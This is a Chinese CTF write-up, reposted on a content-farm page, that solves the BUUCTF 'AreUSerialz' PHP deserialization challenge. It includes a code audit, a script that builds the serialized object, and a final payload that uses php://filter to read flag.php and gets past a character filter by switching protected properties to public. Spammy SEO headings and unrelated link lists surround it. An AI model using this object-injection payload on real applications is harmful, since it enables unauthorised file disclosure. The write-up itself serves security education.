当前位置: 首页 > news >正文

网站备案注销找哪个部门关键字是什么意思

网站备案注销找哪个部门,关键字是什么意思,网站推广的目的是什么,网站建设找题目来源&#xff1a;BUUCTF [网鼎杯 2020 青龙组]AreUSerialz 一、打开靶机&#xff0c;整理信息 直接得到一串php代码&#xff0c;根据题目可以看到还有序列化 二、解题思路 step 1&#xff1a;代码审计 <?phpinclude("flag.php");highlight_file(__FILE__…

题目来源:BUUCTF  [网鼎杯 2020 青龙组]AreUSerialz

一、打开靶机,整理信息

        直接得到一串php代码,根据题目可以看到还有序列化

二、解题思路

step 1:代码审计

<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler {  //创建FileHandler类//定义了三个受保护的属性protected $op;protected $filename;protected $content;//构造函数,对三个受保护的属性进行初始化,然后调用process()方法function __construct() {$op = "1";$filename = "/tmp/tmpfile";$content = "Hello World!";$this->process();}//定义公共的成员方法,并根据$this->op的值来执行不同的操作public function process() {if($this->op == "1") {$this->write();  //值为1,则调用write方法进行文件写入操作} else if($this->op == "2") {$res = $this->read();  //值为2,则调用read方法读取文件内容,并将结果传递给output方法输出$this->output($res);} else {$this->output("Bad Hacker!");}}//定义公共的成员方法private function write() {if(isset($this->filename) && isset($this->content)) {  //检查二者是否都已设置if(strlen((string)$this->content) > 100) {  //经检查$thie->content的长度$this->output("Too long!");die();}$res = file_put_contents($this->filename, $this->content);  //使用file_put_contents函数将$this->content写入$this->filename文件中,根据写入结果输出相应的信息if($res) $this->output("Successful!");else $this->output("Failed!");} else {$this->output("Failed!");}}private function read() {$res = "";if(isset($this->filename)) {  //检查$this->filename是否已设置,如果设置则使用file_get_contents()函数读取该文件的内容并返回$res = file_get_contents($this->filename);}return $res;}//输出[Result]: <br>作为前缀,然后输出传入的字符串$sprivate function output($s) {echo "[Result]: <br>";echo $s;}//析构函数,如果$this->op严格等于"2",则将其设置为"1",清空$this->content,然后调用process()方法。function __destruct() {if($this->op === "2")$this->op = "1";$this->content = "";$this->process();}}//检查传入的字符串$s中的每个字符的ASCII码是否在32到125之间,如果有不在该范围内的字符则返回false,否则返回true
function is_valid($s) {for($i = 0; $i < strlen($s); $i++)if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))return false;return true;
}//处理GET请求
if(isset($_GET{'str'})) {  //检查GET请求是否包含str参数,如果包含,将其转换为字符串并调用is_valid()函数进行验证$str = (string)$_GET['str'];if(is_valid($str)) {$obj = unserialize($str);  //验证通过则对该字符串进行反序列化操作}}

代码总结:几个重要的点①满足op=1,则进行write写入操作,op=2,就会执行read方法和output方法;②满足content<100,则将$this->content写入$this->filename文件中;③利用ord函数,检查$s的字符串的ASCII值是否在32-125之间(包含了空格、符号、数字、大小写字母),这里用%00转换为\00即可绕过;④GET方式传参,参数是str,传入的值为字符串类型,然后要进行反序列化操作

step 2:开始解题

        要想得到flag,需要绕过process方法,防止op=1,所以令op=2,直接进入read函数,然后传入filename,并使用file_get_contents函数读取文件,可以借助php://filter伪协议读取文件,获取文件后使用output函数输出

        一个需要注意的地方是,$op,$filename,$content三个变量权限都是protected,而protected权限的变量在序列化的时会有%00*%00字符,%00字符的ASCII码为0,就无法通过上面的is_valid函数校验。

摘自[网鼎杯 2020 青龙组]AreUSerialz - 春告鳥 - 博客园

突破protected访问修饰符限制

        大佬的脚本如下([网鼎杯 2020 青龙组]AreUSerialz - 春告鳥 - 博客园)

<?phpclass FileHandler {protected $op=2;protected $filename="php://filter/read=convert.base64-encode/resource=flag.php";protected $content;function __construct() {$op = "1";$filename = "/tmp/tmpfile";$content = "Hello World!";// $this->process();}public function process() {if($this->op == "1") {$this->write();} else if($this->op == "2") {$res = $this->read();$this->output($res);} else {$this->output("Bad Hacker!");}}private function write() {if(isset($this->filename) && isset($this->content)) {if(strlen((string)$this->content) > 100) {$this->output("Too long!");die();}$res = file_put_contents($this->filename, $this->content);if($res) $this->output("Successful!");else $this->output("Failed!");} else {$this->output("Failed!");}}private function read() {$res = "";if(isset($this->filename)) {$res = file_get_contents($this->filename);}return $res;}private function output($s) {echo "[Result]: <br>";echo $s;}function __destruct() {if($this->op === "2")$this->op = "1";$this->content = "";// $this->process();}}
$A=new FileHandler();
$B=serialize($A);
echo $B;

        运行得到的结果有三个地方字符显示不正确的地方就是%00字符,这里可以利用本地序列化的时候将属性改为public进行绕过(php7.1+版本对属性类型不敏感),即

public $op=2;
public $filename="php://filter/read=convert.base64-encode/resource=flag.php";
public $content;

得到正常结果

        构造payload

?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}

得到一串base64编码过的信息,进行base64解码,得到flag

三、小结

1.和反序列化有关的题目还是得写脚本

2.新知识:突破protected访问修饰符限制

http://www.zhongyajixie.com/news/2237.html

相关文章:

  • asp.net答辩做网站google推广
  • 建筑猎头网杭州上城区抖音seo如何
  • 做网站如何使用特殊字体长春seo顾问
  • 独立购物网站建设分析网站
  • 免费网站看v片在线第一次做品牌策划书
  • 如何对网站用户分析网络营销的概念
  • 高端手机网站定制自媒体135网站免费下载安装
  • 新疆网站建设咨询电商平台推广公司
  • 黑帽seo365t技术重庆seo排名技术
  • 单网页网站百度客服投诉中心
  • 从事网站开发需要哪些知识关键词优化如何做
  • 做外商备案的网站关键词优化工具互点
  • 网站是用dreamer做的_为什么后台能进去前台进不去了网络服务商主要包括哪些
  • 长沙做网站 必看 磐石网络百度客服怎么转人工电话
  • 设计公司官网首页北京seo地址
  • 网站ie兼容性差营销存在的问题及改进
  • 麦包包网站建设特点免费开通网站
  • 汽车商城网站建设武汉网站搜索引擎优化
  • 做网站的人怎么联系google关键词排名
  • 网站怎么投放广告百度推广是怎么做的
  • 网站开发 需求链交换反应
  • h5网站开发用什么软件制作百度指数在线查询
  • 企业网络推广情况介绍如何做网站推广及优化
  • 做公司网站需要注意什么网站如何做seo推广
  • 帮网贷做网站会判刑吗百度网站推广排名
  • 做营销型网站的教程sem专员
  • 如何做免费网站推广网站关键词
  • 网站运营专员月薪多少苏州关键词优化搜索排名
  • 网站怎么做端口映射长尾关键词挖掘词工具
  • wordpress函数手册领硕网站seo优化